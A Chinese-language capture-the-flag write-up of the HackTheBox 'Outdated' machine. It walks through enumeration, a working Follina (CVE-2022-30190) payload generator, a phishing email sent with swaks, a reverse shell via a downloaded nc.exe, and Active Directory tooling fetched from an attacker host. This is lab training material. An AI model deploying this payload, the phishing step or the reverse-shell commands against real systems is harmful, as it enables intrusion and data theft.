Outdated-htb-writeup

0x00 靶场技能介绍

章节技能：匿名FTP访问、CVE-2022-30190、swaks、SharpHound.exe、impacket-smbserver、Whisker、Rubeus.exe、asktgt、WSUS、SharpWSUS.exe、PsExec64.exe

参考链接：https://0xdf.gitlab.io/2022/12/10/htb-outdated.html

0x01 用户权限获取

1、靶机介绍

Outdated 是一款中等难度的 Linux 机器，其立足点基于 2022 年的“Follina” CVE。该框进一步包含一个 Active Directory 场景，我们必须从域用户转向域控制器，使用一系列工具来利用“AD”的配置和相邻边缘来发挥我们的优势。最后一步包括利用 Windows Server Update Services-WSUS 并利用其糟糕的配置来破坏域控制器。

2、扫描下开放端口情况

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- -Pn 10.10.11.175 --min-rate=10000
[sudo] kali 的密码：
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-10 15:17 CST
Nmap scan report for 10.10.11.175
Host is up (0.20s latency).
Not shown: 65513 filtered tcp ports (no-response)
PORT      STATE SERVICE
25/tcp    open  smtp
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
8530/tcp  open  unknown
8531/tcp  open  unknown
9389/tcp  open  adws
49667/tcp open  unknown
49687/tcp open  unknown
49688/tcp open  unknown
49913/tcp open  unknown
63320/tcp open  unknown
63353/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 28.17 seconds
                                                                                                                                                           
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -sC -sV -Pn 10.10.11.175 --min-rate=10000 -p25,53,88,135,139,389,445,464,593,636,3269,5985,8530,8531,9389,49667,49687,49688,49913,63320,63353 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-10 15:20 CST
Nmap scan report for 10.10.11.175
Host is up (0.26s latency).

PORT      STATE    SERVICE       VERSION
25/tcp    filtered smtp
53/tcp    open     domain        Simple DNS Plus
88/tcp    open     kerberos-sec  Microsoft Windows Kerberos (server time: 2024-10-10 15:08:50Z)
135/tcp   filtered msrpc
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open     ldap          Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-10-10T15:10:23+00:00; +7h48m26s from scanner time.
| ssl-cert: Subject: commonName=DC.outdated.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.outdated.htb
| Not valid before: 2023-12-13T00:17:36
|_Not valid after:  2024-12-12T00:17:36
445/tcp   open     microsoft-ds?
464/tcp   open     kpasswd5?
593/tcp   open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   filtered ldapssl
3269/tcp  open     ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-10-10T15:10:24+00:00; +7h48m26s from scanner time.
| ssl-cert: Subject: commonName=DC.outdated.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.outdated.htb
| Not valid before: 2023-12-13T00:17:36
|_Not valid after:  2024-12-12T00:17:36
5985/tcp  open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8530/tcp  filtered unknown
8531/tcp  filtered unknown
9389/tcp  open     mc-nmf        .NET Message Framing
49667/tcp filtered unknown
49687/tcp open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
49688/tcp open     msrpc         Microsoft Windows RPC
49913/tcp open     msrpc         Microsoft Windows RPC
63320/tcp filtered unknown
63353/tcp filtered unknown
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-10-10T15:09:42
|_  start_date: N/A
|_clock-skew: mean: 7h48m25s, deviation: 0s, median: 7h48m25s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 101.36 seconds

3、这里开放了53端口，让我们看下有没有域传送漏洞吧

┌──(kali㉿offsec)-[~/Desktop]
└─$ dig @10.10.11.175 outdated.htb any

; <<>> DiG 9.19.21-1-Debian <<>> @10.10.11.175 outdated.htb any
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 45883
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 0, ADDITIONAL: 4

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;outdated.htb.                  IN      ANY

;; ANSWER SECTION:
outdated.htb.           600     IN      A       172.16.20.1
outdated.htb.           600     IN      A       10.10.11.175
outdated.htb.           3600    IN      NS      dc.outdated.htb.
outdated.htb.           3600    IN      SOA     dc.outdated.htb. hostmaster.outdated.htb. 228 900 600 86400 3600
outdated.htb.           600     IN      AAAA    dead:beef::f0e8:43c9:447b:c336

;; ADDITIONAL SECTION:
dc.outdated.htb.        3600    IN      A       10.10.11.175
dc.outdated.htb.        3600    IN      A       172.16.20.1
dc.outdated.htb.        3600    IN      AAAA    dead:beef::f0e8:43c9:447b:c336

;; Query time: 116 msec
;; SERVER: 10.10.11.175#53(10.10.11.175) (TCP)
;; WHEN: Thu Oct 10 15:40:58 CST 2024
;; MSG SIZE  rcvd: 225

4、本地绑定下hosts信息

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.175 dc.outdated.htb hostmaster.outdated.htb outdated.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码：
10.10.11.175 dc.outdated.htb hostmaster.outdated.htb outdated.htb

5、尝试扫描下共享目录

┌──(kali㉿offsec)-[~/Desktop]
└─$ netexec smb 10.10.11.175 -u guest -p '' --shares
SMB         10.10.11.175    445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:outdated.htb) (signing:True) (SMBv1:False)                                                                                                                                                         
SMB         10.10.11.175    445    DC               [+] outdated.htb\guest: 
SMB         10.10.11.175    445    DC               [*] Enumerated shares
SMB         10.10.11.175    445    DC               Share           Permissions     Remark
SMB         10.10.11.175    445    DC               -----           -----------     ------
SMB         10.10.11.175    445    DC               ADMIN$                          Remote Admin
SMB         10.10.11.175    445    DC               C$                              Default share
SMB         10.10.11.175    445    DC               IPC$            READ            Remote IPC
SMB         10.10.11.175    445    DC               NETLOGON                        Logon server share 
SMB         10.10.11.175    445    DC               Shares          READ            
SMB         10.10.11.175    445    DC               SYSVOL                          Logon server share 
SMB         10.10.11.175    445    DC               UpdateServicesPackages                 A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system.                                                                                    
SMB         10.10.11.175    445    DC               WsusContent                     A network share to be used by Local Publishing to place published content on this WSUS system.                                                                                                                                    
SMB         10.10.11.175    445    DC               WSUSTemp                        A network share used by Local Publishing from a Remote WSUS Console Instance. 

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbmap -H 10.10.11.175 -u 'guest' -p ''

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
                                                                                                    
[+] IP: 10.10.11.175:445        Name: dc.outdated.htb           Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        Shares                                                  READ ONLY
        SYSVOL                                                  NO ACCESS       Logon server share 
        UpdateServicesPackages                                  NO ACCESS       A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system.
        WsusContent                                             NO ACCESS       A network share to be used by Local Publishing to place published content on this WSUS system.
        WSUSTemp                                                NO ACCESS       A network share used by Local Publishing from a Remote WSUS Console Instance.

6、还是有些收获的，让我们看看可访问目录里的文件吧

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient //10.10.11.175/Shares -N                 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Jun 20 23:01:33 2022
  ..                                  D        0  Mon Jun 20 23:01:33 2022
  NOC_Reminder.pdf                   AR   106977  Mon Jun 20 23:00:32 2022

                9116415 blocks of size 4096. 1941803 blocks available
smb: \> get NOC_Reminder.pdf 
getting file \NOC_Reminder.pdf of size 106977 as NOC_Reminder.pdf (101.6 KiloBytes/sec) (average 101.6 KiloBytes/sec)
smb: \> exit

7、这里发现了个PDF文件，尝试分析查看

┌──(kali㉿offsec)-[~/Desktop]
└─$ exiftool NOC_Reminder.pdf 
ExifTool Version Number         : 12.76
File Name                       : NOC_Reminder.pdf
Directory                       : .
File Size                       : 107 kB
File Modification Date/Time     : 2024:10:10 16:38:56+08:00
File Access Date/Time           : 2024:10:10 16:38:57+08:00
File Inode Change Date/Time     : 2024:10:10 16:38:56+08:00
File Permissions                : -rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.3
Linearized                      : No
Page Count                      : 1
Profile CMM Type                : Linotronic
Profile Version                 : 2.1.0
Profile Class                   : Display Device Profile
Color Space Data                : RGB
Profile Connection Space        : XYZ
Profile Date Time               : 1998:02:09 06:49:00
Profile File Signature          : acsp
Primary Platform                : Microsoft Corporation
CMM Flags                       : Not Embedded, Independent
Device Manufacturer             : Hewlett-Packard
Device Model                    : sRGB
Device Attributes               : Reflective, Glossy, Positive, Color
Rendering Intent                : Perceptual
Connection Space Illuminant     : 0.9642 1 0.82491
Profile Creator                 : Hewlett-Packard
Profile ID                      : 0
Profile Copyright               : Copyright (c) 1998 Hewlett-Packard Company
Profile Description             : sRGB IEC61966-2.1
Media White Point               : 0.95045 1 1.08905
Media Black Point               : 0 0 0
Red Matrix Column               : 0.43607 0.22249 0.01392
Green Matrix Column             : 0.38515 0.71687 0.09708
Blue Matrix Column              : 0.14307 0.06061 0.7141
Device Mfg Desc                 : IEC http://www.iec.ch
Device Model Desc               : IEC 61966-2.1 Default RGB colour space - sRGB
Viewing Cond Desc               : Reference Viewing Condition in IEC61966-2.1
Viewing Cond Illuminant         : 19.6445 20.3718 16.8089
Viewing Cond Surround           : 3.92889 4.07439 3.36179
Viewing Cond Illuminant Type    : D50
Luminance                       : 76.03647 80 87.12462
Measurement Observer            : CIE 1931
Measurement Backing             : 0 0 0
Measurement Geometry            : Unknown
Measurement Flare               : 0.999%
Measurement Illuminant          : D65
Technology                      : Cathode Ray Tube Display
Red Tone Reproduction Curve     : (Binary data 2060 bytes, use -b option to extract)
Green Tone Reproduction Curve   : (Binary data 2060 bytes, use -b option to extract)
Blue Tone Reproduction Curve    : (Binary data 2060 bytes, use -b option to extract)
Producer                        : macOS Version 10.15.7 (Build 19H1922) Quartz PDFContext
Creator                         : Word
Create Date                     : 2022:06:20 15:00:32Z
Modify Date                     : 2022:06:20 15:00:32Z

8、翻译分析下

由于上周的安全漏洞，我们需要重建一些核心服务器。这已经影响了我们的一些工作站，更新
服务、监控工具和备份。在我们重建工作中，请通过电子邮件将任何内部网络应用程序的链接发送至
itsupport@outdated.htb因此，我们可以将它们添加回我们的监控平台，以进行警报和通知。
我们还为SOC安排了一名新员工来协助处理此事，并加快恢复我们的更新服务，以确保所有
关键漏洞已修补，服务器已更新。下面的CVE列表是首要任务，我们必须确保这些列表已得到修补
尽快。
提前感谢您的帮助。如果您有任何问题，请联系上面的邮件列表。

9、那就结合漏洞，给目标发送利用吧，首先找一些参考文章

CVE-2022-30190

https://www.cnblogs.com/zhibing/p/16893827.html

https://github.com/doocop/CVE-2022-30190

我将向itsupport@outdated.htb笔记中注明的电子邮件地址发送一封电子邮件，其中包含指向 Folina 漏洞的链接。通常，Folina 被打包在 Word 文档中，以真正避免弹出窗口等问题。要解决 Outdated，我只需要使用一个使用 JavaScript 重定向到 URL 的 HTML 页面msdt://。

10、生成有效载荷

#!/usr/bin/env python3

import base64
import random
import string
import sys

if len(sys.argv) > 1:
    command = sys.argv[1]
else:
    command = "IWR http://10.10.16.7/nc.exe -outfile C:\\programdata\\nc.exe; C:\\programdata\\nc.exe 10.10.16.7 443 -e cmd"

base64_payload = base64.b64encode(command.encode("utf-8")).decode("utf-8")

# Slap together a unique MS-MSDT payload that is over 4096 bytes at minimum
html_payload = f"""<script>location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \\"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'{base64_payload}'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\\""; //"""
html_payload += (
    "".join([random.choice(string.ascii_lowercase) for _ in range(4096)])
    + "\n</script>"
)

print(html_payload)

┌──(kali㉿offsec)-[~/Desktop]
└─$ python3 exp.py   
<script>location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'SVdSIGh0dHA6Ly8xMC4xMC4xNi43L25jLmV4ZSAtb3V0ZmlsZSBDOlxwcm9ncmFtZGF0YVxuYy5leGU7IEM6XHByb2dyYW1kYXRhXG5jLmV4ZSAxMC4xMC4xNi43IDQ0MyAtZSBjbWQ='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\""; //rilehusgxhxlqviyxkjxyvkvgmcwdobycrwetonistelgwswjngdmcelwfbpixayvlbclhvrusfpdcpjstszkkqyoefvnipjbdhdvpstqwfsmadsxzmdstucueugszimjtnnyatepdhzwygpujdgvbjhqsttdzheydpjygvxjsxvtnpesmrjbruvvkwcayqkozceijqnwrbhibpleklbapsklahrhedeipfdvbuuvkvuhrdxznakoleoixbdbblssawlrxmlfztxekwdoriknkgoqeejkyqhokwariepjgbyphxlpbnbbeoahwleeeifpazodyoquxfzvuophwlgdcvdvkbxsmiyljyxjchwupomlkyhdmjtivrhmqqifnokcjypezugzdrpsbxqwcxpwztccxvgzoolcraqeyiwyelcvhxugbglqknwugsunfhasdkolofvdcethpahqeudnjnyzpbdexaseojouuaycliifiptxnpbfzyhyesymosxouohgubdfwcmeyqgeycwmcmdbqalfylkqqxocgyfohaqtrhzlbqtttrwoiotogrvraejhjmuhaaevobatcznokeptjkyxozfarkckvnvubzibsbtrlkqulvcbsgbvozluxixaojdjstdwvblvdiviijdcjdcqzxexdspoahtjdjgxmmkijkijlvsaprxfohfveqzujiqfylvsilknwhnwyfeheopjsttckpmooltstspzufvflqkfgtqyefabdpuatyaerxxgeubqbvwnfenkgeaektpuxsuwrqzftsvguszxiylebyhizqbgxppuaglrcsbodsrqwgiflsxvrihamwxudlmsstkmfckrioezpbpcludwvepkjgfdhklorcpacatbojjsodixpzxqpadxerdiidhjeqsufzgtcyqjtuodqmhjbueilvuugwdnyqlqoiyvhyrhrdnbgtjsmxixmlimtgepaatpeaiicsgorlnpgewepcxfztyljhduftkkegkuiiwsxrhcmypjbzgvrpkcqafuaimqhtmahfmunsqncvplipoqwlvlxwboupyeatgggczhichjrmbxugkgtbgziadsqsuwasbssbexectbxvqrtlcmpzbwkdhgvqvjvamsksdfeyeycrntgxmvvstcawvvucuqhnqcmjdpopbfgdbahsekyujgfjtpjfxlyloyvchqomaazqfkzvcchmcokeospjwfpymtohprznetwmditatysbxfetxdihfnbegpcijhprimklsmndhqrnjqtlasnzmvehfgizuotdcvfnwnaidqmxbbxqehsnqufioqhmrgnkajznlgyxnjyclrfemkiyvosvzqadcpqjqrmzxhbswtetpuvvnlcopwgwweedjyxvkrztwkhcxjusnzasqokeevggmtlamofyzzcqmypiclhzvufuvhayhsfrvcfxuwnqisdprrifirsulaqknserjnjlzflmdvqczkdcmpobhmsziwsfjbyprvksimepaqvrsrpnetwavtxusjxokadozkxvarrsvpwsdlevxztcpegtdocureyrcxqeuquagkadgolkrzclllskrzcccxnqatmtsiyoaotljoyzvtlfgdsbinyzlerzevcsqidatafoyjeaxibpzlkfathukntcyfkzrlpywltrjkijvhaissdpbdjaislusuwklhjtxrooditjctatfmohycybtujqdkhuhebdsuccftvrxyjmruglacekrctjbyzmosmdxagmpgkgpqntwfexukmkwicxbkauxgqvimiinjkhmlbpmlajnsqegysqhtrvjisndxxybjupulwobbyaqayeckuypitgvbyptxcbnyacfvmofvfujofdcnbdhwcsrqjqtyscsfxfuagfoeuitfjhmnieucauaantdthaxzgdeyrosxfsidolaignpepbuosulhckjkuntgmwlkfopewxkswchxqrkcczowhsstdukrygozsnlzitddgxyyejddzklinxznoacrbrvpvgkcrptzebljknaiivutptlfpfeusdphvbecvmsjhcgcvailzdqlyjeumymnkwqtajklvfricburcdleleitiwzngnewmpjichhygcpdhwfmustxzowmitikqgblknirhvrwxsihqvbumalocaudgxhfzdeybwhentyeosyprzktwnalcxpqdfjkqawutbjsejrhrqgsukatdutbnfzcchiegofdzvgiqjhvpfwidzmdmbuuasmmcdjkwwwgbrgxstmzsltrgyhhvgxckwrsypjhudmvdviovrgicudbficxhyhsvrpfomobwkhyxabmhkzcvbnnvyrdllndnbzabbtcmnbrmgqrhlvfsdwmgkcbuvpavtqpcmpbdwvprqpbhpocqzgplihlsveqbwtwojwufnjittywmkclmymizjqjyieqdgfvztjqfydqlzpaqzsitdelvyphszjpzeitnsqfnkkhctodbcdsqoazkdwnctvbbhktfuaolyenyyxtkwcrjqdpedklqgrhxoryabejupntcpymmlchffdgwyulebcwtakdknbwyakwmqtboxfmejusnkwxlxnnkmbfazfgtqnishldiindrhtdzxuusszdricbzlvmpwttwsoyubeybhhhfjakxmjmmvefgndebpiscpeotogymixfckhgthpbhnbeplrnagvducgwudmxlcyarvdfwuupoeexljfbtrtpddrcmbbfroyytpjqaszvdlgxvjfosyzizkzmuokrsbyojqklsebstiaffzbvmnlthibdculpsgapyijpzjhstvqgpfhldezpnlpeejatuqzekaakvnrmfuxyariwioiawrbalgrnbubzevhtyxqndiwwxsskhjpbpaqlmlqvhloneqslcfzbghrjgwyquzwxdoeewrjeppgwwqcrdomfiqfledjqyamsktlhdysvhmjlbcnetnekscjorkhidfhtatfzbsffovuvoqjfhhdfeqpwkvbawwjezuiszurjapurvbmxfwjavodssvxraslhlnvcfsookjxjctprqozpfgtbbsthumysjgvxmvugfluxjsdnavlrgyhwbcfcqfdflmjweerfqzhnggljdzkxragdvdruabvhbzrrsueopzeudgioyhvlirejatudybvuvuxlqujvjqmcegnlqybortotyzikllenqgjelwnwjsooravlidfironkdtgwzpowtklgxbagozpjjeaobchhrwlnhltxqlcquxnrmunjjtdwholeqmdndtfffdxuizizdkeqrcbrkobshceuwatvnzdslqhnskyyuilriwcuteejrjvhkuiqkxwoofazkeovvbrjhocpszjyrhekjptthvltmsxtrdtjwrkscwoczzjduxwnmacknpfjjeovkdwwwlybaorluzoynkgcsbphqjzkcfcloixalbtpwlhvqruxkogaaesxauhddvysqfsptdnyxanxardnpsdfupmluxlcbgmhxxrbllwbguskcrljxinrfbwyzizwymlnjidohuowbcimgetkpvuihogicyurqyxvuzesbkosxdpeoafnsudqarocrftalvaknniooxvhpzxjctvshkelpdhdcwcsklplemugcwnttxgstupkbopbpcnovxaegijzkljgscjwovddmerttnnlhbshwyxxckvxjquolhnxycmolxiykhwixymnugvqlrdqomgnybfdxawgwbyjrbeophyvccztqdbdjvukkgnactnskuejalyklvzmvdeqqiplalevvvkbwgtwokdswnilhqmggyukyufaswdryiogwtliccvntrllxeccprmbhidordtksyzjkmlsydatcffiowynbqeuaniqqybpfpvtsocppxgqbpkrcpzoejskwzimydjwqfkmextymesvmupqpojahpaoqccbgpdqnqmkddmoswltlkryxjdlhgdzyqctmtkppiggjqehliczjzg
</script>

11、将生成的JS代码保存到 msdt.html 里。

12、itsupport@outdated.htb我将通过电子邮件将链接发送至swaks：

┌──(kali㉿offsec)-[~/Desktop]
└─$ swaks --to itsupport@outdated.htb --from "shiyan@qq.com" --header "Subject: Internal web app" --body "http://10.10.16.7/msdt.html"
=== Trying outdated.htb:25...
=== Connected to outdated.htb.
<-  220 mail.outdated.htb ESMTP
 -> EHLO offsec
<-  250-mail.outdated.htb
<-  250-SIZE 20480000
<-  250-AUTH LOGIN
<-  250 HELP
 -> MAIL FROM:<shiyan@qq.com>
<-  250 OK
 -> RCPT TO:<itsupport@outdated.htb>
<-  250 OK
 -> DATA
<-  354 OK, send.
 -> Date: Thu, 10 Oct 2024 16:53:45 +0800
 -> To: itsupport@outdated.htb
 -> From: shiyan@qq.com
 -> Subject: Internal web app
 -> Message-Id: <20241010165345.055704@offsec>
 -> X-Mailer: swaks v20240103.0 jetmore.org/john/code/swaks/
 -> 
 -> http://10.10.16.7/msdt.html
 -> 
 -> 
 -> .
<-  250 Queued (10.485 seconds)
 -> QUIT
<-  221 goodbye
=== Connection closed with remote host.


┌──(kali㉿offsec)-[~/Desktop]
└─$ python3 -m http.server 80  
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.175 - - [10/Oct/2024 16:54:22] "GET /msdt.html HTTP/1.1" 200 -
10.10.11.175 - - [10/Oct/2024 16:54:23] "GET /nc.exe HTTP/1.1" 200 -

13、成功获取到了初始shell

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 443                                    
listening on [any] 443 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.175] 49829
Microsoft Windows [Version 10.0.19043.928]
(c) Microsoft Corporation. All rights reserved.

C:\Users\btables\AppData\Local\Temp\SDIAG_c46ad4a5-222a-455b-8c73-8b7950730864>whoami
whoami
outdated\btables

C:\Users\btables\AppData\Local\Temp\SDIAG_c46ad4a5-222a-455b-8c73-8b7950730864>

14、通过分析，发现当前主机位于域环境下

C:\Users\btables\Desktop>systeminfo
systeminfo

Host Name:                 CLIENT
OS Name:                   Microsoft Windows 10 Enterprise N
OS Version:                10.0.19043 N/A Build 19043
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Member Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          setup
Registered Organization:   
Product ID:                00330-00182-51735-AA058
Original Install Date:     6/15/2022, 8:20:38 AM
System Boot Time:          10/10/2024, 6:53:06 AM
System Manufacturer:       Microsoft Corporation
System Model:              Virtual Machine
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2994 Mhz
BIOS Version:              American Megatrends Inc. 090007 , 5/18/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory:     1,506 MB
Available Physical Memory: 495 MB
Virtual Memory: Max Size:  2,146 MB
Virtual Memory: Available: 892 MB
Virtual Memory: In Use:    1,254 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    outdated.htb
Logon Server:              \\DC
Hotfix(s):                 4 Hotfix(s) Installed.
                           [01]: KB4601554
                           [02]: KB5000736
                           [03]: KB5001330
                           [04]: KB5001405
Network Card(s):           1 NIC(s) Installed.
                           [01]: Microsoft Hyper-V Network Adapter
                                 Connection Name: Ethernet
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 172.16.20.20
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

C:\Users\btables\Desktop>

C:\Users\btables\Desktop>net time /domain
net time /domain
Current time at \\DC.outdated.htb is 10/10/2024 8:49:42 AM

The command completed successfully.


C:\Users\btables\Desktop>

15、是域的话， 呢就上传域环境分析工具把

C:\Users\btables\Desktop>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Users\btables\Desktop> iwr http://10.10.16.7/SharpHound.exe -outfile s.exe
iwr http://10.10.16.7/SharpHound.exe -outfile s.exe
PS C:\Users\btables\Desktop> 


PS C:\Users\btables\Desktop> dir
dir


    Directory: C:\Users\btables\Desktop


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----        10/10/2024   8:51 AM        1046528 s.exe                                                                


PS C:\Users\btables\Desktop> 

16、执行扫描

PS C:\Users\btables\Desktop> .\s.exe -C all
.\s.exe -C all
2024-10-10T08:52:36.6661803-07:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2024-10-10T08:52:36.7911805-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-10-10T08:52:36.8068052-07:00|INFORMATION|Initializing SharpHound at 8:52 AM on 10/10/2024
2024-10-10T08:52:37.0317513-07:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for outdated.htb : DC.outdated.htb
2024-10-10T08:52:37.2036286-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-10-10T08:52:37.3986303-07:00|INFORMATION|Beginning LDAP search for outdated.htb
2024-10-10T08:52:37.4299223-07:00|INFORMATION|Producer has finished, closing LDAP channel
2024-10-10T08:52:37.4299223-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2024-10-10T08:53:07.4824678-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 36 MB RAM
2024-10-10T08:53:24.2608866-07:00|INFORMATION|Consumers finished, closing output channel
2024-10-10T08:53:24.2921599-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2024-10-10T08:53:24.3546400-07:00|INFORMATION|Status: 97 objects finished (+97 2.108696)/s -- Using 44 MB RAM
2024-10-10T08:53:24.3546400-07:00|INFORMATION|Enumeration finished in 00:00:46.9558203
2024-10-10T08:53:24.4171382-07:00|INFORMATION|Saving cache with stats: 56 ID to type mappings.
 57 name to SID mappings.
 1 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2024-10-10T08:53:24.4171382-07:00|INFORMATION|SharpHound Enumeration Completed at 8:53 AM on 10/10/2024! Happy Graphing!
PS C:\Users\btables\Desktop> dir
dir


    Directory: C:\Users\btables\Desktop


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----        10/10/2024   8:53 AM          11819 20241010085323_BloodHound.zip                                        
-a----        10/10/2024   8:53 AM           8553 MjdhMDc5MjItNDk4MS00NjFiLWFkY2ItZjQ0ZTBlODI3Mzhh.bin                 
-a----        10/10/2024   8:51 AM        1046528 s.exe                                                                


PS C:\Users\btables\Desktop> 

17、使用SMB协议，将文件回传回来

┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-smbserver -smb2support share .                           
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

PS C:\Users\btables\Desktop> net use \\10.10.16.7\share
net use \\10.10.16.7\share
The command completed successfully.

PS C:\Users\btables\Desktop> copy 20241010085323_BloodHound.zip \\10.10.16.7\share\
copy 20241010085323_BloodHound.zip \\10.10.16.7\share\
PS C:\Users\btables\Desktop>

18、接下来进行分析

19、下载漏洞利用工具，进行漏洞利用

https://github.com/eladshamir/Whisker

https://github.com/sh1yan/HTB-Tools-Macos/blob/main/SharpCollection/NetFramework_4.7_Any/Whisker.exe

PS C:\Users\btables\Desktop> iwr http://10.10.16.7/Whisker.exe -outfile w.exe
iwr http://10.10.16.7/Whisker.exe -outfile w.exe
PS C:\Users\btables\Desktop> dir 
dir


    Directory: C:\Users\btables\Desktop


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----        10/10/2024   8:53 AM          11819 20241010085323_BloodHound.zip                                        
-a----        10/10/2024   8:53 AM           8553 MjdhMDc5MjItNDk4MS00NjFiLWFkY2ItZjQ0ZTBlODI3Mzhh.bin                 
-a----        10/10/2024   8:51 AM        1046528 s.exe                                                                
-a----        10/10/2024   9:08 AM          41984 w.exe                                                                


PS C:\Users\btables\Desktop> 

20、运行它来查找 sflowers 的任何当前条目。没有：

.\w.exe list /domain:outdated.htb /target:sflowers /dc:DC.outdated.htb

